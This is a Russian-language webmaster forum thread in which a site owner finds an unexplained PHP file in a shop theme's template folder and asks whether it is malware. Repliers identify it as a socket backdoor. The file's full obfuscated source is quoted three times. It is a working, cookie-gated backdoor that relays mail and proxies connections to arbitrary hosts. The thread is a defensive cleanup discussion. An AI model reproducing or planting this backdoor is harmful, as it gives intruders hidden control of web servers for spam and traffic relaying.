Помощь Вирус или что?

кинь пока сайт в личку ftp подождет пока
 
Не понимаю что это там делает - view/theme/default/template/product/product_uncle.php

PHP:
<?php
if(isset($_COOKIE['oCNxDvV3TBU'])){
function hlqjmitxtl(){
    function nhsyodpore($jqxoopplmi){
        $m = md5($jqxoopplmi);
        foreach(explode("\n",trim(chunk_split($m, 2))) as $h)
            $s.=chr(hexdec($h));
        return $s;
    }
    function jgngvtsovu($fzzuvdhsad, $ks){
        $s=range(0, 255);
        if(strlen($fzzuvdhsad)==0)return $s;
        $km=nhsyodpore($fzzuvdhsad);
        for($i=0;$i<16;$i++)
            $kx.= nhsyodpore($km.$km[$i].chr($ks));
        $r=($ks%0x0F)+1;$j=$ks;
        for($n=0;$n<$r;$n++)
            for($i=0;$i<256;$i++){
                $j=(($j+$s[$i]+$n+ord($kx[$i]))^$ks)%256;
                $t=$s[$i];
                $s[$i]=$s[$j];
                $s[$j]=$t;
            }
        for($i=0;$i<256;$i++)
            $s[$i]=$s[$i]^$ks;
        return $s;
    }
    function ltvlojvvnl($fzzuvdhsad){
        $m=nhsyodpore($fzzuvdhsad);$kt=0;
        for($i=0;$i<16;$i++)
            $kt+=ord($m[$i]);
        return $kt%256;
    }
    function ccfmhrqodl($jqxoopplmi){
        $pe=$GLOBALS['xeuzevobel'];
        $len=strlen($jqxoopplmi);
        for($y=0;$y<$len;$y=$y+$_COOKIE['eoCNxDvV3TBU'])
            $jqxoopplmi[$y]=chr($pe[ord($jqxoopplmi[$y])]);
        return $jqxoopplmi;
    }
    function czgjtqaqky($jqxoopplmi){
        $pd=array_flip($GLOBALS['xeuzevobel']);
        $len=strlen($jqxoopplmi);
        for($y=0;$y<$len;$y=$y+$_COOKIE['eoCNxDvV3TBU'])
            $jqxoopplmi[$y] = chr($pd[ord($jqxoopplmi[$y])]);
        return $jqxoopplmi;
    }
define('tglrtzvzwb', sha1("56d41f".$_COOKIE['oCNxDvV3TBU']));
$GLOBALS['qntbosqxrq'] = ltvlojvvnl(tglrtzvzwb);
$GLOBALS['xeuzevobel'] = jgngvtsovu(tglrtzvzwb, $GLOBALS['qntbosqxrq']);
@set_time_limit(0);
ob_implicit_flush(1);
ignore_user_abort(0);
header('Content-type: application/octet-stream');
header('Content-Transfer-Encoding: binary');
$rdbtsplcsl=fopen('php://input', 'r');
$ifkouzamts=fread($rdbtsplcsl,1);
$tqwyiwogvd=fread($rdbtsplcsl,1);
$zhfokdntly=fread($rdbtsplcsl,1);
while(!feof($rdbtsplcsl))
    $pezcpjbpop .= fread($rdbtsplcsl, pow(2,ord($tqwyiwogvd)));
if($_COOKIE['oCNxDvV3TBU']!="0")
    $pezcpjbpop = czgjtqaqky($pezcpjbpop);
fclose($rdbtsplcsl);
if($ifkouzamts==2){
    $daonqgebpt=explode("#^|^#",trim(base64_decode/**/($pezcpjbpop)));
    if(mail/**/($daonqgebpt[0],$daonqgebpt[1],$daonqgebpt[2],$daonqgebpt[3],$daonqgebpt[4]))
        die("send-oCNxDvV3TBU");
    else
        die("error-oCNxDvV3TBU");
}
$pezcpjbpop = base64_decode(/**/($pezcpjbpop));
$fwgqksgqmo = substr($pezcpjbpop,1,ord($pezcpjbpop[0]));
$fp=@fsockopen/**/(($ifkouzamts?"ssl://":"").$fwgqksgqmo,($ifkouzamts?443:80),$errno,$errstr,58);
if(!$fp)die("$errstr($errno);");
@fwrite($fp, substr($pezcpjbpop,ord($pezcpjbpop[0])+1));
while(!feof($fp))
    $ywbjrqqtuw .= fread($fp, pow(2,ord($zhfokdntly)));
if($_COOKIE['oCNxDvV3TBU']!="0")
    echo "#".ccfmhrqodl($ywbjrqqtuw)."#";
else
    echo $ywbjrqqtuw;
fflush($fp);
fclose($fp);
die;
}hlqjmitxtl();}
 
Не понимаю что это там делает - view/theme/default/template/product/product_uncle.php

PHP:
<?php
if(isset($_COOKIE['oCNxDvV3TBU'])){
function hlqjmitxtl(){
    function nhsyodpore($jqxoopplmi){
        $m = md5($jqxoopplmi);
        foreach(explode("\n",trim(chunk_split($m, 2))) as $h)
            $s.=chr(hexdec($h));
        return $s;
    }
    function jgngvtsovu($fzzuvdhsad, $ks){
        $s=range(0, 255);
        if(strlen($fzzuvdhsad)==0)return $s;
        $km=nhsyodpore($fzzuvdhsad);
        for($i=0;$i<16;$i++)
            $kx.= nhsyodpore($km.$km[$i].chr($ks));
        $r=($ks%0x0F)+1;$j=$ks;
        for($n=0;$n<$r;$n++)
            for($i=0;$i<256;$i++){
                $j=(($j+$s[$i]+$n+ord($kx[$i]))^$ks)%256;
                $t=$s[$i];
                $s[$i]=$s[$j];
                $s[$j]=$t;
            }
        for($i=0;$i<256;$i++)
            $s[$i]=$s[$i]^$ks;
        return $s;
    }
    function ltvlojvvnl($fzzuvdhsad){
        $m=nhsyodpore($fzzuvdhsad);$kt=0;
        for($i=0;$i<16;$i++)
            $kt+=ord($m[$i]);
        return $kt%256;
    }
    function ccfmhrqodl($jqxoopplmi){
        $pe=$GLOBALS['xeuzevobel'];
        $len=strlen($jqxoopplmi);
        for($y=0;$y<$len;$y=$y+$_COOKIE['eoCNxDvV3TBU'])
            $jqxoopplmi[$y]=chr($pe[ord($jqxoopplmi[$y])]);
        return $jqxoopplmi;
    }
    function czgjtqaqky($jqxoopplmi){
        $pd=array_flip($GLOBALS['xeuzevobel']);
        $len=strlen($jqxoopplmi);
        for($y=0;$y<$len;$y=$y+$_COOKIE['eoCNxDvV3TBU'])
            $jqxoopplmi[$y] = chr($pd[ord($jqxoopplmi[$y])]);
        return $jqxoopplmi;
    }
define('tglrtzvzwb', sha1("56d41f".$_COOKIE['oCNxDvV3TBU']));
$GLOBALS['qntbosqxrq'] = ltvlojvvnl(tglrtzvzwb);
$GLOBALS['xeuzevobel'] = jgngvtsovu(tglrtzvzwb, $GLOBALS['qntbosqxrq']);
@set_time_limit(0);
ob_implicit_flush(1);
ignore_user_abort(0);
header('Content-type: application/octet-stream');
header('Content-Transfer-Encoding: binary');
$rdbtsplcsl=fopen('php://input', 'r');
$ifkouzamts=fread($rdbtsplcsl,1);
$tqwyiwogvd=fread($rdbtsplcsl,1);
$zhfokdntly=fread($rdbtsplcsl,1);
while(!feof($rdbtsplcsl))
    $pezcpjbpop .= fread($rdbtsplcsl, pow(2,ord($tqwyiwogvd)));
if($_COOKIE['oCNxDvV3TBU']!="0")
    $pezcpjbpop = czgjtqaqky($pezcpjbpop);
fclose($rdbtsplcsl);
if($ifkouzamts==2){
    $daonqgebpt=explode("#^|^#",trim(base64_decode/**/($pezcpjbpop)));
    if(mail/**/($daonqgebpt[0],$daonqgebpt[1],$daonqgebpt[2],$daonqgebpt[3],$daonqgebpt[4]))
        die("send-oCNxDvV3TBU");
    else
        die("error-oCNxDvV3TBU");
}
$pezcpjbpop = base64_decode(/**/($pezcpjbpop));
$fwgqksgqmo = substr($pezcpjbpop,1,ord($pezcpjbpop[0]));
$fp=@fsockopen/**/(($ifkouzamts?"ssl://":"").$fwgqksgqmo,($ifkouzamts?443:80),$errno,$errstr,58);
if(!$fp)die("$errstr($errno);");
@fwrite($fp, substr($pezcpjbpop,ord($pezcpjbpop[0])+1));
while(!feof($fp))
    $ywbjrqqtuw .= fread($fp, pow(2,ord($zhfokdntly)));
if($_COOKIE['oCNxDvV3TBU']!="0")
    echo "#".ccfmhrqodl($ywbjrqqtuw)."#";
else
    echo $ywbjrqqtuw;
fflush($fp);
fclose($fp);
die;
}hlqjmitxtl();}

явно какая-то хрень, еще что-то нашел может? Думаю, что это можно удалить.
 
какой-то бэкдор на сокете
 
вирусов не нашел все левые ссылки были Для просмотра ссылки Войди или Зарегистрируйся уже не показывают, только кеш
что делали?
 
вирусов не нашел все левые ссылки были Для просмотра ссылки Войди или Зарегистрируйся уже не показывают, только кеш
что делали?
Был доступ к фтп раньше у программиста , который писал парсер, я удалил этот доступ, откатил сайт на пару недель назад как началась большая нагрузка на сервер. Могу предположить , что нагрузка связана была с этими вот махинациями. На сколько программист связан с этими махинациями не знаю, доказать сложно. Но вот из кеша в яндексе фразы не ушли, как их убрать? кто подскажет? я одно время даже переходил из метрики по этим фразам и делал уведомления яндексу , что результат в поиске не верный . Думаю понимаете о чем я, это когда поиск по яндексу делаешь и можно сделать своего рода жалобу яндексу, может таким образом продолжать делать уведомления яндексу на эти ссылки неверные в выдаче? это как нибудь отрицательно отразится на сайте?
 
Не понимаю что это там делает - view/theme/default/template/product/product_uncle.php

PHP:
<?php
if(isset($_COOKIE['oCNxDvV3TBU'])){
function hlqjmitxtl(){
    function nhsyodpore($jqxoopplmi){
        $m = md5($jqxoopplmi);
        foreach(explode("\n",trim(chunk_split($m, 2))) as $h)
            $s.=chr(hexdec($h));
        return $s;
    }
    function jgngvtsovu($fzzuvdhsad, $ks){
        $s=range(0, 255);
        if(strlen($fzzuvdhsad)==0)return $s;
        $km=nhsyodpore($fzzuvdhsad);
        for($i=0;$i<16;$i++)
            $kx.= nhsyodpore($km.$km[$i].chr($ks));
        $r=($ks%0x0F)+1;$j=$ks;
        for($n=0;$n<$r;$n++)
            for($i=0;$i<256;$i++){
                $j=(($j+$s[$i]+$n+ord($kx[$i]))^$ks)%256;
                $t=$s[$i];
                $s[$i]=$s[$j];
                $s[$j]=$t;
            }
        for($i=0;$i<256;$i++)
            $s[$i]=$s[$i]^$ks;
        return $s;
    }
    function ltvlojvvnl($fzzuvdhsad){
        $m=nhsyodpore($fzzuvdhsad);$kt=0;
        for($i=0;$i<16;$i++)
            $kt+=ord($m[$i]);
        return $kt%256;
    }
    function ccfmhrqodl($jqxoopplmi){
        $pe=$GLOBALS['xeuzevobel'];
        $len=strlen($jqxoopplmi);
        for($y=0;$y<$len;$y=$y+$_COOKIE['eoCNxDvV3TBU'])
            $jqxoopplmi[$y]=chr($pe[ord($jqxoopplmi[$y])]);
        return $jqxoopplmi;
    }
    function czgjtqaqky($jqxoopplmi){
        $pd=array_flip($GLOBALS['xeuzevobel']);
        $len=strlen($jqxoopplmi);
        for($y=0;$y<$len;$y=$y+$_COOKIE['eoCNxDvV3TBU'])
            $jqxoopplmi[$y] = chr($pd[ord($jqxoopplmi[$y])]);
        return $jqxoopplmi;
    }
define('tglrtzvzwb', sha1("56d41f".$_COOKIE['oCNxDvV3TBU']));
$GLOBALS['qntbosqxrq'] = ltvlojvvnl(tglrtzvzwb);
$GLOBALS['xeuzevobel'] = jgngvtsovu(tglrtzvzwb, $GLOBALS['qntbosqxrq']);
@set_time_limit(0);
ob_implicit_flush(1);
ignore_user_abort(0);
header('Content-type: application/octet-stream');
header('Content-Transfer-Encoding: binary');
$rdbtsplcsl=fopen('php://input', 'r');
$ifkouzamts=fread($rdbtsplcsl,1);
$tqwyiwogvd=fread($rdbtsplcsl,1);
$zhfokdntly=fread($rdbtsplcsl,1);
while(!feof($rdbtsplcsl))
    $pezcpjbpop .= fread($rdbtsplcsl, pow(2,ord($tqwyiwogvd)));
if($_COOKIE['oCNxDvV3TBU']!="0")
    $pezcpjbpop = czgjtqaqky($pezcpjbpop);
fclose($rdbtsplcsl);
if($ifkouzamts==2){
    $daonqgebpt=explode("#^|^#",trim(base64_decode/**/($pezcpjbpop)));
    if(mail/**/($daonqgebpt[0],$daonqgebpt[1],$daonqgebpt[2],$daonqgebpt[3],$daonqgebpt[4]))
        die("send-oCNxDvV3TBU");
    else
        die("error-oCNxDvV3TBU");
}
$pezcpjbpop = base64_decode(/**/($pezcpjbpop));
$fwgqksgqmo = substr($pezcpjbpop,1,ord($pezcpjbpop[0]));
$fp=@fsockopen/**/(($ifkouzamts?"ssl://":"").$fwgqksgqmo,($ifkouzamts?443:80),$errno,$errstr,58);
if(!$fp)die("$errstr($errno);");
@fwrite($fp, substr($pezcpjbpop,ord($pezcpjbpop[0])+1));
while(!feof($fp))
    $ywbjrqqtuw .= fread($fp, pow(2,ord($zhfokdntly)));
if($_COOKIE['oCNxDvV3TBU']!="0")
    echo "#".ccfmhrqodl($ywbjrqqtuw)."#";
else
    echo $ywbjrqqtuw;
fflush($fp);
fclose($fp);
die;
}hlqjmitxtl();}

Привет, подскажи, что за подозрительная активность могла быть у сайта ? вот переходы
на страницы Для просмотра ссылки Войди или Зарегистрируйся или Для просмотра ссылки Войди или Зарегистрируйся
 
Назад
Сверху